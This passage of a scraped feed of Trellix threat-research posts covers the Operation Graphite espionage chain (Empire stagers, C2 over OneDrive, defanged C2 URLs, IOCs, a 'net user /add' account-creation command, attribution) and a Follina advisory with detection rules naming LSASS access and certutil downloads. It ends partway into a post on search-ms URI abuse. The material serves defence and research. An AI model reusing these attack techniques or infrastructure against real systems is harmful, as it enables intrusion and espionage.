.NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the most prevalent industries are Defense and Government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool, a PTR record was obtained resolving to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d which could be an indication that the server was bought from the Bitcoin Web Hosting VPS reseller company.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second stage DLL.\n\nThe second domain identified is wordkeyvpload.org which resolves to the IP 185.117.88.19, located in Sweden, and registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server (Microsoft-IIS/7.5) and the open ports (1337 and 5000) it is very likely the host is running the latest version of the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of Empire servers uses port 1337 to host a RESTful API and port 5000 hosts a SocketIO interface to interact remotely with the server. Also, when deploying a HTTP Listener, the default value for the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d.\n\n **Figure 24. Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed in victims\u2019 machines and send commands to execute them.\n\n#### Attribution\n\nDuring the timeline of this operation there have been some political tensions around the Armenian and Azerbaijani border. Therefore, from a classic intelligence operation point of view, it would make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of activity from the attackers from our telemetry and found two consistent trends. First, the activity days of the adversary are from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries.\n\nAnalyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28. We compared for example our samples towards this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe on the left side of the below picture the graphite sample and on the right the forementioned 2018 sample. With almost three years in time difference, it makes sense that code is changed, but still it looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims\u2019 systems since it will only connect to legitimate Microsoft domains and won\u2019t show any suspicious network traffic.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control from the actors and the final payload, which is an agent from the post-exploitation framework Empire. All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With a low and moderate confidence, we believe this operation was executed by APT28. To further investigate, we provided some tactics, techniques and procedures (TTPs), indicators on the infrastructure, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&amp;CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as a command and control. | wordkeyvpload[.]net \nwordkeyvpload[.]org \nResource Development | T1587.001 | Develop capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Develop capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spear phishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire Powershell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. | CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive \nEmpire Server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES 256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-03T00:00:00", "description": "\n\n# Trellix Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)\n\nBy Taylor Mullins, **Robin Noyce**, **Benjamin Marandel** \u00b7 June 3, 2022\n\nTrellix is continuing to monitor the threat activity associated with the Microsoft Office Zero-Day vulnerability that has been dubbed \u201cFollina.\u201d Chinese-linked Threat Actors are actively exploiting this zero-day vulnerability to execute malicious code remotely. At the time of this writing there is no official patch from Microsoft, but steps and protections can be put into place to mitigate against the attacks utilizing this Microsoft vulnerability.\n\n[Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)\n\nThe method at which these attacks are taking place is using malicious Word documents that execute PowerShell commands via the Microsoft Diagnostic Tool (MSDT). The \u2018Follina\u2019 zero-day features a remote code execution that works without elevated privileges, does not require macro enablement to execute binaries or scripts, and can bypass Windows Defender detection. Opening a Microsoft Word document in preview mode in Explorer is another method to detonate the malicious code which provides a vector for the exploitation to take place outside of the Protected View that Microsoft is reporting will prevent the attack. Furthermore, it is a signed binary, which enables the code to bypass windows validation controls. The Follina vulnerability is exploitable with Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365.\n\n## Microsoft recommended workaround for microsoft support diagnostic tool (MSDT)\n\nMicrosoft has released guidance on disabling the Microsoft Diagnostic Tool (MSDT) URL protocol. The Microsoft Support Diagnostic Tool (MSDT) is a tool designed to collect information to send to the Microsoft Support.\n\n[CISA: Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>)\n\n Figure 1. Workaround provided by Microsoft to mitigate against exploitation \n\n\n## Trellix product protections for follina vulnerability\n\nTrellix is continuing to add protections via threat feeds and content updates to the Trellix products as Indicators of Compromises (IOCs) and behavioral techniques are detected in the wild. In addition, there are initiative-taking steps that can further protect your environment against the attacks targeting the Follina zero-day vulnerability.\n\n Figure 2. MITRE ATT&amp;CK Matrix for Exploitation of Follina Vulnerability. Source: MVISION Insights \n\n\n## Follina zero-day threat intelligence and hunting rules\n\nMVISION Insights is continually updated with the latest threat intelligence and known indicators that are being discovered related to the Microsoft zero-day vulnerability. Additionally, applying hunting rules and threat intelligence across the security stack is key for early detection and identification of the Tactics, Techniques, and Procedures (TTPs) associated with Follina.\n\n#### MVISION Insights Campaign Name - Follina \u2014 A Microsoft Office Code Execution Vulnerability\n\n Figure 3. YARA, Snort, and Sigma Hunting Rules specific to Follina Vulnerability Source: MVISION Insights \n Figure 4. Campaign overview and detections for Follina. Source: MVISION Insights \n Figure 5. Follina Indicators of Compromise (IOCs) and endpoint detections. Source: MVISION Insights \n Figure 6. MVISION Insights API to pull Campaign Threat Intelligence for further correlation across data events. \n\n\n## Utilizing expert and behavioral rules in trellix endpoint security\n\nTrellix ENS Threat Prevention and Adaptive Threat Protection (ATP) monitor Microsoft Word process activity and the start of a child Command line processes is detected and blocked (if configured to) by ENS ATP. Trellix ENS can also block common processes like cmd.exe from being spawned by Microsoft Office applications in a suspicious manner. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**Exploit Prevention Signature 6113: T1055 - Fileless Threat: Reflective Self Injection \nExploit Prevention Signature 6127: Suspicious LSASS Access from PowerShell \nExploit Prevention Signature 6143: T1003 - Attempt to Dump Password Hash from SAM Database \nExploit Prevention Signature 8004: Fileless Threat: Malicious PowerShell Behavior Detected**\n\n**ATP Rule 239: Identify suspicious command parameter execution \nATP Rule 263: Detect processes accessing suspicious URLs \nATP Rule 301: Blocks cmd.exe from being spawned by office applications \nATP Rule 332: Prevent certutil.exe from downloading or decoding files with suspect extensions**\n\nThe Trellix Advanced Threat Research (ATR) team has also created the following ENS Expert Rule to prevent techniques associated with exploitation. Outlined below are several screenshots on how to create this specific Expert Rule in Trellix ENS. Per standard practice, we recommend that customers test this rule in Report Only before moving to Block mode.\n\n[Detect new code injection method in Microsoft Office CVE-2022-30190](<https://github.com/advanced-threat-research/Expert-Rules/blob/main/Block_Office_Code_Execution.md>)\n\n[How to Use Expert Rules in ENS to Prevent Malicious Exploits](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/>)\n\n Figure 7. Creation of the Expert Rule in the Trellix ENS Exploit Prevention Policy \n Figure 8. Creating specific Expert Rule for Microsoft Office (CVE-2022-30190) in Trellix ENS \n\n\n## Hunting for suspicious behavior with MVISION EDR\n\nMVISION EDR has the capability to search across historical and real-time data on endpoints to identify specific activity associated with exploitation and the MSDT process. Several examples and queries are noted below for using Historical and Real-time searches to analyze the Microsoft Diagnostic Tool (MSDT) process activity and interaction with CMD and PowerShell.\n\n**Processes and HostInfo hostname where Processes name equals msdt.exe** \u2013 Real-time search query to locate activity specific to the Microsoft Diagnostic Tool (MSDT) process\n\n**ProcessName = msdt.exe** \u2013 Historical search string to locate prior activity from MSDT.exe across your endpoints even if they are currently offline.\n\n Figure 9. MVISION EDR Real-time search to locate ongoing MSDT.exe activity \n Figure 10. MVISION EDR Historical Search query across all endpoints either online or offline to locate prior MSDT.exe process activity \n\n\n## Trellix network security platform signature release\n\nTrellix has released a User-Defined Signature (UDS) for the Network Security Platform (NSP) to provide an immediate solution to this security advisory. Trellix writes and tests these signatures with the objective of a quick turnaround.\n\n[Knowledge Center - REGISTERED - NSP Emergency UDS Release Notes - UDS-HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (mcafee.com)](<https://kcm.trellix.com/agent/index?page=content&id=KB95702>)\n\n## Additional resources\n\n[](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>)Microsoft: Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability \n[Huntress: Rapid Response: Microsoft Office RCE - \u201cFollina\u201d MSDT Attack](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>) \n[Bleeping Computer: Windows MSDT zero-day now exploited by Chinese APT hackers](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>)\n", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Follina \u2014 Microsoft Office Zero-Day (CVE-2022-30190)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-03T00:00:00", "id": "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/follina-microsoft-office-zero-day-cve-2022-30190.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-20T00:00:00", "description": "\n\n# Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite\n\nBy Ben Marandel, **Arnab Roy** \u00b7 June 20, 2022\n\nCyber Espionage campaigns by nature are targeted attacks that can go undetected for prolonged periods of time. Cyber Espionage campaigns often involve adversaries with clear objectives with capabilities to avoid defenses and leverage trusted enterprise IT systems or operational weaknesses within organisations. Some of the key targets for espionage campaigns are as follows:\n\n Figure 1: Cyber Espionage Key Targets \n\n\nThe ultimate goal of most cyber espionage campaigns are data exfiltration and wide spread reconasaince.\n\n## Operation graphite introduction \n\nTrellix Advanced Threat Research team released threat research on the 25th of January 2022 which highlighted discovery of a new espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. The attack is believed to have been triggered via targeted phishing with malicious macro enabled word document used to establish the initial access. Once executed the malicious document leveraged a vulnerability in Excel (CVE2021-40444) which allows remote code execution on the impacted endpoint. Similar to other espionage campaigns their was hands on recon of the targeted organization, specifically looking for documents with specific keywords of interest. This was followed by multi-stage attack which included lateral movement to other systems of interest such as domain controllers and file servers. The following figure shows the attack progression:\n\n Figure 2: Attack Chain \n\n\nLike most multi-stage attacks a combination of exploitation techniques are observed such as use of LolBas/LolBins like Powershell and exploitation of enterprise architecture and system vulnerabilities.\n\nDuring our analysis of the overall flow of the attack and the related payloads the following attributes of the attack stood out that could be critical at detecting/preventing this threat:\n\n 1. Use of OneDrive as a command a control server as well as for storing payload configuration and staging. Their is evidence that the OneDrive Implant module of the empire framework was used by the threat actor which has been documented by the [empire framework maintainers](<https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/>). This was used specifically to subvert network security controls and hide traffic inside legitimate applications. \n 2. Use of embedded XLS into XLSX to bypass macro execution protection added in Office Excel. The XLS file is used as a secondary payload which is exploiting the CVE-2021-40444, this is not the first file to be open by the victim. To maximize the chances of execution of the exploitable XLS document the attacker uses dynamic loading of the office ribbon and custom options in the office toolbar by using a XLSM file, this XLSM file then dynamically loads the XLS file which triggers the execution of CVE-2021-40444.\n\nBased on the observed TTP\u2019s and operational similarity Trellix Threat research team was moderately confident that this attack could be attributed to APT 28.\n\n## Defensive architecture guidance\n\nThe question is how do we protect ourselves from such attacks? At the heart of the answer is building an effective threat model for cyber espionage campaigns and then driving your defensive strategy based on \u201cthink red - act blue mindset\u201d where the threat informed layered defensive strategy drives how the security controls are configured to provide a resilient defensive architecture. Below is how the Trellix XDR solution architecture protects and detects this attack.\n\n Figure 3: Trellix Solution Architecture \n\n\nOrganizations can build an effective threat model based on adversary characteristics some of which is very well documented within the MITRE ATT&amp;CK framework. Leveraging tools like MITRE ATT&amp;CK navigator is one of the methods where you can combine multiple threat actor TTP\u2019s and create an effective threat model for your SOC, an example below for TTP\u2019s used by APT 28:\n\n**Common techniques used for Cyber Espionage - using ATT&amp;CK**\n\n Figure 4: MITRE ATT&amp;CK Navigator for APT28 \n\n\nHowever, for customers who have Trellix Insights this process is even simpler: By filtering the Profiles to APT28, you will get a complete overview of the APT28 Group activities. As an introduction the tool will give you a short description of the group and their current targeted countries / sectors. \n\n Figure 5: APT28 Group Overview from MVISION Insights \n\n\nJust after this introduction, you will get overview of the 42+ campaign currently observed by the Trellix Labs. This view also indicates which endpoints within your organization may have insufficient coverage to protect themselves. By clicking on the name of the campaign, you will pivot to the full details of the selected campaign.\n\n Figure 6: Examples of APT28 related campaigns from MVISION Insights \n\n\nThe third section of the interface, describes the MITRE Techniques of Tools used by APT28 group. Once C2 communications is established, researchers established the use of \u201cFiles and Directory Discovery \u2013 T1083\u201d technique for Discovery and \u201cData Transfer Size Limits \u2013 T1030\u201d technique for Exfiltration.\n\nThis group also uses tools such as Mimikatz to simplify Credential Access via LSASS Memory \u2013 T1003.001, Certutil to download third-party tools or X-Tunnel for Exfiltration over Asymmetric Encrypted Non-C2 Protocols \u2013 T1048.002. \n\n Figure 7: MITRE Techniques used by the APT28 Group from MVISION Insights \n\n\nAnd finally, based on all those information, the interface builds for you the powerful ATT&amp;CK Matrix with a clear representation of the observed techniques.\n\n Figure 8: APT28 Group MITRE ATT&amp;CK matrix from MVISION Insights \n\n\n**Endpoint Protection Actions:** Trellix Endpoint uses exploit prevention to block execution of CVE-2021-40444 as well as use behavioral threat protection via Adaptive Threat Prevention module. Specifically, Advanced Behavior Blocking (ABB) rules stop the execution of child processes from office processes thus breaking the kill chain early in the attack lifecycle. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**ENS Exploit Prevention Signature 6163:** T1055: Suspicious Behavior: Malicious Shell Injection Detected\n\n**ENS Exploit Prevention Signature 6115:** T1055: Fileless Threat: Reflective DLL Remote Injection\n\n**ENS ATP Rule 300:** T1566: Prevent office applications from launching child processes that can execute script commands \n\nTo complement protection capabilities, Trellix EDR solution detects and visualizes the attack chain, as illustrated bellow at the \u201cInitial Access\u201d when the victim is opening for the first time the specifically crafted XLSX file.\n\nIn this screenshot of a demo sample illustrating Office Excel, you can observe the download of the XLS file natively through an HTTPS connection, after it has opened the XLSX file.\n\n Figure 9: Excel.exe opening an XLSX file and then downloading an XLS file, captured by MVISION EDR \n\n\n**Preventing Data Exfiltration:** Preventing the attempts to exfiltrate data can defeat this type of attack at an early stage. The threat actor uses two key techniques for data exfiltration: exfiltration over existing network protocols and endpoint data reconnaissance techniques. The exfiltration over the existing network protocol leverages the Microsoft Graph API utilized by O365 suite of apps to communicate between various O365 services. The graph API has been a target of previous APT campaigns as it provides a unique insight into existing enterprise data sitting inside O365. One of the key ways this attack can be completely defeated is by ensuring users cannot login to non-sanctioned O365 tenants. This is possible by leveraging a URL content proxy that inspects the O365 instance id in the login URL of the tenant and subsequent communication. The proxy can be configured to only allow the organizational tenant id of the enterprise O365 instance and not that of other O365 tenants. This will prevent the threat actor from succeeding in establishing the initial command and control connection as well as data exfiltration. Deploying endpoint DLP is the second critical factor in preventing the data exfiltration of sensitive information leaving organizational perimeter. This includes getting visibility into endpoint processes accessing sensitive/tagged data.\n\n**Bringing Visibility into the SOC with XDR:** Detecting multi-vector telemetry requires context and correlation across multiple data sources so that the right alerts and telemetry is presented to the SOC analyst for effective triage, scoping of the threat and effective incident response.\n\n Figure 10: Example XDR Correlation with multi-vector sensor telemetry from Threat Intelligence, Endpoint, DLP \n\n\n**Integrated sandbox for malware analysis:** As part of the Trellix solution architecture, the endpoints are capable of sending files dynamically or through integrated SOAR workflows to the Trellix Detection on Demand Cloud Sandbox. A quick analysis of the XLSX document reveals that pseudo data was used entice the end user into opening the document.\n\n Figure 11: Trellix DOD Analysis \n\n\n## Summary\n\nDefeating a multi-stage cyberespionage campaign requires a multipronged defensive strategy that starts by building an effective threat model leading to prioritization and deployment of highest impact preventive controls which leads to a security model that stalls the attackers progress and delivering enterprise resilience to cyberespionage campaigns. Some of the key steps in building such resilience is as follows:\n\n Figure 12: Cyber Espionage Playbook \n\n\nFor additional details and understanding, you can view our Threat Center webinar with Trellix Solution Architects explaining how we defend against this attack [here](<https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6305609522112&eid=P5SWSAQK>).\n", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-20T00:00:00", "id": "TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/defending-against-cyber-espionage-campaigns-operation-graphite.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-26T00:00:00", "description": "# Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler\n\nBy [Mathanraj Thangaraju](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/mathanraj-tk.html>) and [Sijo Jacob](<https://www.trellix.com/en-in/about/newsroom/stories/contributors/sijo-jacob.html>) \u00b7 July 26, 2023\n\n## Threat Summary\n\nIn the ever-evolving landscape of cyber threats, malware authors continuously explore new avenues to exploit unsuspecting users. The Windows operating system provides a powerful search feature that allows users to quickly find files, folders, and other items on their computers. One of the less known aspects of this search feature is the \"[search-ms](<https://learn.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>)\" URI protocol handler, which offers enhanced search capabilities to perform local searches. It also offers the capability to perform queries on file shares located on remote hosts, this can be exploited, as explained in our Trellix Research [blog](<https://www.trellix.com/en-in/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html>).\n\nIn an exciting discovery, Trellix Advanced Research Center has uncovered a novel attack technique leveraging the \u201csearch-ms\u201d URI protocol handler. While we were already aware of attackers exploiting the \u201csearch-ms\u201d URI protocol handler through malicious documents, our investigation has revealed an advancement in their approach. We have discovered that attackers are directing users to websites that exploit the \u201csearch-ms\u201d functionality using JavaScript hosted on the page. This technique has even been extended to HTML attachments, expanding the attack surface. In our research, we have not only explored the capabilities of \"search-ms\" protocol but also the \u201c[search](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc144083\\(v=vs.85\\)#syntax>)\u201d protocol. The \u201csearch\u201d application protocol was created in Windows Vista with SP1 and later versions. The operating system uses the search protocol to launch the default desktop search application. Leveraging the power of both protocols, we successfully utilized the search functionality in various script files, including Batch, Visual Basic, PHP, and PowerShell. This demonstrates the versatility and effectiveness of this attack technique, harnessing the features of both search protocols to carry out malicious activities.\n\nDuring an attack leveraging the \u201csearch\u201d / \u201csearch-ms\u201d URI protocol handler, threat actors may create deceptive emails containing hyperlinks or email attachments that redirect users to compromised websites. When users visit the website, malicious Java scripts initiate searches on a remote server using the \u201csearch\u201d / \"search-ms\" URI protocol handler. The search results of remotely hosted Malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results. This smart technique conceals the fact that the user is being provided with remote files and gives the user the illusion of trust. As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.\n\nIn this blog, we aim to provide a comprehensive understanding of how threat actors leverage the \u201csearch-ms\u201d URI protocol handler as a vehicle for their malicious activities and steps involved from initial delivery to payload execution.\n\n## Infection Chain\n\n Figure 1: Execution flow of the attack \n\n\n## Real-World Phishing Examples\n\nTrellix Advanced Research Center has observed phishing emails making use of the \"search-ms\" URI protocol handler to download malicious payload. These phishing emails are trying to trick the recipient into clicking on a malicious link by pretending to be an urgent request for quotation from sales manager. \n\n Figure 2: Sample phishing emails \n\n\nIn our research, we encountered other forms of attack variants such as utilization of emails with HTML or PDF attachments. These attachments contained URLs leading to compromised website hosting scripts that incorporated the \u2018search-ms\u201d URI protocol handler. In addition, HTML files can also initiate the attack by embedding scripts that trigger the execution of \u201csearch-ms\u201d URI protocol handler.\n\n Figure 3: PDF files with URL containing the \u201csearch-ms\u201d URI protocol handler \n\n\nUpon clicking the link in email or attachment, recipient would be redirected to the website abusing \u201csearch-ms\u201d URI protocol handler. Below we see the GET request for page.html from Figure 2 highlighting the suspicious script:\n\n Figure 4: HTML with \u201csearch-ms\u201d URI Protocol Handler \n\n### Invisible Threats: Demystifying the Dark Side of \u201cSearch-MS\u201d URI Protocol Handler\n\nThe code snippet highlighted in above figure invokes the \u201csearch-ms\u201d URI protocol handler to perform a search operation on an attacker-controlled server. Let us break down the code and understand its components:\n\n * &lt;script&gt;&lt;/script&gt;: This code is encapsulated within the &lt;script&gt; tags, which denote JavaScript code within an HTML document.\n * window.location.href: This JavaScript statement refers to the current URL 